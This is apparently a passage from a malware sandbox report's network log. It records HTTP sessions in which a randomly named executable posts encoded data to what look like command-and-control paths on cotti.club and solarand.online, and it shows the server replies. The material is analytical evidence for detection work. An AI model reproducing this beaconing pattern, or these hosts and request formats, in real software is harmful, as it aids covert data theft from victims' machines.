                                                                                                                                                                              Data Ascii: 78=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449793103.120.80.111803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:08.989305973 CET724OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 77 6e 34 79 77 5a 37 53 2b 4b 65 64 70 6b 49 4c 43 56 71 78 71 52 71 6c 65 43 72 76 71 34 78 41 68 4e 41 78 74 77 53 42 42 77 58 6a 32 44 37 58 5a 6e 73 6f 79 6c 77 62 79 6b 62 47 61 53 54 55 48 4a 4d 4d 6f 61 75 42 78 42 45 48 6f 2b 69 76 55 57 4b 2b 62 78 63 41 31 76 39 72 2f 4a 70 43 52 59 59 50 58 6b 6a 7a 51 68 2f 50 2f 67 4e 57 52 45 52 7a 44 73 2b 39 62 49 52 39 2b 69 38 31 6b 76 53 73 6a 74 59 38 67 38 31 33 6a 56 79 67 7a 6c 30 6d 45 73 69 53 64 37 79 4c 6b 79 33 36 37 6c 70 42 36 42 33 53 57 73 68 6e 2f 7a 59 38 6d 32 32 4a 34 38 55 45 72 4b 76 57 38 67 56 72 52 56 77 36 46 53 48 63 34 77 3d
                                                                                                                                                                              Data Ascii: 78=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvq4xAhNAxtwSBBwXj2D7XZnsoylwbykbGaSTUHJMMoauBxBEHo+ivUWK+bxcA1v9r/JpCRYYPXkjzQh/P/gNWRERzDs+9bIR9+i81kvSsjtY8g813jVygzl0mEsiSd7yLky367lpB6B3SWshn/zY8m22J48UErKvW8gVrRVw6FSHc4w=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449809103.120.80.111803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:11.538006067 CET10806OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 77 6e 34 79 77 5a 37 53 2b 4b 65 64 70 6b 49 4c 43 56 71 78 71 52 71 6c 65 43 72 76 72 73 78 41 54 31 41 79 4b 73 53 41 42 77 58 70 57 44 32 58 5a 6d 32 6f 32 4a 4b 62 79 68 35 47 66 65 54 56 6c 42 4d 59 4a 61 75 53 52 42 45 46 6f 2b 6e 68 30 57 6c 2b 62 68 51 41 30 66 39 72 2f 4a 70 43 58 63 59 47 6c 41 6a 78 51 68 38 47 66 67 42 63 78 45 70 7a 48 35 46 39 62 64 6d 39 50 43 38 32 46 44 53 71 51 46 59 67 77 38 33 36 44 56 71 67 7a 70 72 6d 45 68 54 53 65 6e 55 4c 69 4f 33 72 4d 30 73 57 35 52 79 51 46 55 2f 34 4e 58 6a 37 6b 71 41 47 4b 46 76 43 75 57 73 4a 4f 63 36 6d 77 49 36 75 47 65 57 43 59 50 4b 6d 64 5a 6c 57 43 58 64 52 33 59 7a 4c 53 71 4e 4f 78 6b 35 53 35 51 70 63 79 74 6d 2b 42 38 35 4f 4b 37 4a 71 36 74 70 64 42 30 56 46 34 79 36 54 36 72 4e 61 77 59 38 6a 48 4e 6e 4e 6b 6f 70 71 56 2b 34 4f 45 52 56 70 6c 77 43 70 4f 73 57 36 79 49 50 57 36 5a 2b 6e 55 39 30 64 66 41 6c 64 35 77 79 67 64 72 4c 47 53 2b 56 4c 48 66 43 2b 45 72 67 55 4e 46 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvrsxAT1AyKsSABwXpWD2XZm2o2JKbyh5GfeTVlBMYJauSRBEFo+nh0Wl+bhQA0f9r/JpCXcYGlAjxQh8GfgBcxEpzH5F9bdm9PC82FDSqQFYgw836DVqgzprmEhTSenULiO3rM0sW5RyQFU/4NXj7kqAGKFvCuWsJOc6mwI6uGeWCYPKmdZlWCXdR3YzLSqNOxk5S5Qpcytm+B85OK7Jq6tpdB0VF4y6T6rNawY8jHNnNkopqV+4OERVplwCpOsW6yIPW6Z+nU90dfAld5wygdrLGS+VLHfC+ErgUNFdl9HXdumkWAUdRCgvkWMMZddPgmEv5yJhcpPZauXLm3Sh3FpDmtrh6Z7/uoSQx0f4FABNNqfHML/3WQ4GykXUyUzdDH9TK+JiorjLYyT1JVOapkpb4XgVmALwf3qh2lxvUFCRCsuj6Qy65Mqi2AWswpdV3F0SNKsKvnxaog00qLxa1H+kpoT0To8qeCLpCZDSfJTbLiv0P85Xakd2/+iSF/Mxm8yjb3Mj31mCS2ef6lt8VRtKT/8pOiFNYQ7dfSRIM4TAQNL6PT1KL3W6OVnYv/cWmf40DbNY+xWb6IY5+jQXAwY5FctvcK5wXB6DEVKxbeEOf+PHAOQhzlmk2koes5TsfMxbYZHmcfET7cQYnnyxU9/0OUcaE5niBHfj0GwoS/cjW5T5sqPnyssH/hwfTyUzXnnH8UHe1t6Eo83b3koNLMSNmKsxTTploSllYvlt6RRo0YRww97krCYpJSIUaZscTtLC/8eI/ZDc7sDZo7SHGYgqkjbd35PC48m05o6b5CQ8ZqOclnp9HAQRlEbLbCFX684gSWQlBKwNO/TyO+MCeHxbCLi26quAPytR/CmYMHIOFbUO6FlxeYiDv2/atjhxdHnZNMdDuZLd3r7M2dlKUMILf9XWfUXAR3lhrv5bXIaYndeGLw2pUt5UGC/YaxbpOS0NapkJ3 [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.449825103.120.80.111803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:14.076658964 CET449OUTGET /3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:38:15.034598112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Server: wts/1.7.0
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:56 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: "65517fce-1a10"
                                                                                                                                                                              Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 6f 74 74 69 2e 63 6c 75 62 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 6f 74 74 69 2e 63 6c 75 62 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>cotti.club-(www.west.cn)</title> <meta name="description" content="cotti.club," /> <meta name="keywords" content="cotti.club," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:15.034614086 CET1236INData Raw: 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 68 31
                                                                                                                                                                              Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd, ul,
                                                                                                                                                                              Oct 31, 2024 01:38:15.034626007 CET424INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c
                                                                                                                                                                              Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
                                                                                                                                                                              Oct 31, 2024 01:38:15.034925938 CET1236INData Raw: 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 35 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: } .domain-con { padding: 20px 50px; position: relative; } .left { background: #f6f6f6 url(http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg
                                                                                                                                                                              Oct 31, 2024 01:38:15.034938097 CET1236INData Raw: 20 23 31 30 37 31 64 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: #1071d2; height: 56px; line-height: 56px; font-size: 20px; text-align: center } .imgpic { padding: 25px 0 20px 0 } .conta
                                                                                                                                                                              Oct 31, 2024 01:38:15.034950018 CET1236INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 2e 63 6e 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 63 6f 74 74 69 2e 63 6c 75 62 22 20 63 6c 61 73 73 3d 22 6f 72 61 6e 67 65 62 74 6e 22 20 74 61 72 67 65 74 3d
                                                                                                                                                                              Data Ascii: ref="https://www.west.cn/ykj/view.asp?domain=cotti.club" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div class="footer-link"
                                                                                                                                                                              Oct 31, 2024 01:38:15.034964085 CET284INData Raw: 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 33
                                                                                                                                                                              Data Ascii: ument.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })();


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.449861217.160.0.60803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:20.338640928 CET719OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 48 71 45 36 66 72 52 62 31 2b 70 77 33 50 6e 44 32 41 79 31 68 62 77 52 54 38 50 56 74 4e 56 68 33 44 56 54 2f 33 51 4a 4b 67 78 6f 43 2b 53 4d 56 75 6d 35 69 6a 4d 54 48 4a 47 32 58 4b 47 7a 77 46 42 68 31 56 32 2f 4b 79 43 4f 41 67 53 72 53 59 6d 58 41 76 6d 53 49 70 6d 32 72 58 49 51 39 47 71 32 4d 31 6c 78 4b 6a 65 47 50 66 75 69 62 38 34 32 68 51 4d 79 2b 6b 56 68 70 33 6e 76 46 6c 36 51 4f 4c 79 58 4e 79 42 72 4e 46 2f 62 74 2b 6c 4d 54 61 75 47 70 4f 74 4c 47 68 79 77 56 79 32 75 34 44 6b 41 4e 43 79 62 30 61 62 6e 56 6a 39 5a 43 67 3d 3d
                                                                                                                                                                              Data Ascii: 78=3m4IRk8oT3XLHqE6frRb1+pw3PnD2Ay1hbwRT8PVtNVh3DVT/3QJKgxoC+SMVum5ijMTHJG2XKGzwFBh1V2/KyCOAgSrSYmXAvmSIpm2rXIQ9Gq2M1lxKjeGPfuib842hQMy+kVhp3nvFl6QOLyXNyBrNF/bt+lMTauGpOtLGhywVy2u4DkANCyb0abnVj9ZCg==
                                                                                                                                                                              Oct 31, 2024 01:38:21.176712036 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:21 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:21.176759958 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.449876217.160.0.60803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:22.877748013 CET739OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 56 62 30 36 65 49 70 62 38 2b 70 7a 38 76 6e 44 68 51 79 78 68 62 38 52 54 34 57 51 74 37 4e 68 33 68 64 54 2b 30 49 4a 44 77 78 6f 4b 65 53 4e 4e 4f 6e 37 69 6a 42 75 48 4d 6d 32 58 4b 53 7a 77 41 39 68 30 69 43 67 59 79 44 6f 42 51 53 6c 50 49 6d 58 41 76 6d 53 49 71 62 2b 72 57 73 51 39 32 61 32 65 45 6c 32 41 44 65 4a 48 2f 75 69 66 38 34 79 68 51 4d 4d 2b 6d 68 66 70 79 6a 76 46 6b 4b 51 4c 4b 79 57 47 79 42 70 41 6c 2b 63 6b 50 4d 37 65 36 6a 46 6e 75 39 73 4f 51 61 75 64 55 37 30 70 79 46 58 66 43 57 6f 70 64 53 54 59 67 41 51 5a 6f 73 4a 4f 59 4d 55 70 6d 6a 6a 4f 78 66 6e 6e 33 6c 63 36 59 67 3d
                                                                                                                                                                              Data Ascii: 78=3m4IRk8oT3XLVb06eIpb8+pz8vnDhQyxhb8RT4WQt7Nh3hdT+0IJDwxoKeSNNOn7ijBuHMm2XKSzwA9h0iCgYyDoBQSlPImXAvmSIqb+rWsQ92a2eEl2ADeJH/uif84yhQMM+mhfpyjvFkKQLKyWGyBpAl+ckPM7e6jFnu9sOQaudU70pyFXfCWopdSTYgAQZosJOYMUpmjjOxfnn3lc6Yg=
                                                                                                                                                                              Oct 31, 2024 01:38:23.716486931 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:23 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:23.716506004 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.449889217.160.0.60803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:25.621701956 CET10821OUTPOST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
